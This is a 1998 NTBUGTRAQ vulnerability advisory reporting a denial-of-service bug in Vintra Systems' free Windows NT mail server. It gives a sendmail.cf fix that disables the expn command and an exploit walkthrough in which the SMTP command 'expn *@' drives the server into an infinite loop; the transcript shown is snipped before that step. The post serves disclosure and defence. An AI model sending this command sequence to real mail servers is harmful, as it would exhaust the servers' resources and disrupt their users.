From: Vytis Fedaravicius (vytis@OT.LT)
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Date: Mon, 20 Jul 1998 20:46:10 +0000
Subject: DOS in Vintra systems Mailserver software.

Hello,

There is a bug in a free MailServer software for Windows NT from Vintra
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause
MTA to go nuts and make CPU ussage up to 99%, eat all available memory and
disk space.

Bug: one opens telnet to 25 port, issues helo, mail from: and rcpt to:
commands, and instead of data command uses expn *@. Softwarre goes in a
infinite loop.

Fix: disable expn command by editing sendmail.cf. Add the folowing line
and restart mta service.

O PrivacyOptions=needmailhelo, noexpn

Exploit (commands to enter are marked ">")

>telnet vulnerable.server.dom 25

220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998
20:18:20 +0200 (Central Europe Daylight Time)

>helo EvilOne

250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet
you

>mail from:bad.boy

250 bad.boy... Sender ok

>rcpt to:resourceLeaker

550 resourceLeaker... User unknown

[snip...]

This software is sendmail based, so may be other implementations are
vulnerable also? Vintra systems were notified


Vytis Fedaravicius
System administrator
Omnitel

e-mail: vytis@ot.lt